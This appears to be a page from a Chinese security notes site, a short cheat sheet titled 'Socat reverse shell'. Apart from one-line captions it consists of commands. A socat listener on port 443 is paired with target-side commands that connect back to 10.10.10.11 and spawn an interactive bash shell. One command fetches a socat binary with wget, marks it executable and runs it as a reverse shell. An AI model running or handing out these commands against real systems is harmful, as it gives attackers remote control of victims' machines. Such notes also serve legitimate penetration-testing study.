menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 011-反弹shell chevron_right 014-Socat反弹shell.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    014-Socat反弹shell.md
    558 B / 2021-07-17 00:01:40
        # Socat反弹shell
    
    首先在本地监听TCP协议443端口
    
    ```bash
    socat file:`tty`,raw,echo=0 TCP-L:443
    
    ```
    
    然后在靶机上执行如下命令:
    
    ```bash
    /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane 
    tcp:10.10.10.11:443
    
    ```
    
    ```bash
    socat tcp-connect:10.10.10.11:443 exec:"bash -li",pty,stderr,setsid,sigint,sane
    
    ```
    
    ```bash
    wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.11:443
    
    ```
    
    
    
    links
    file_download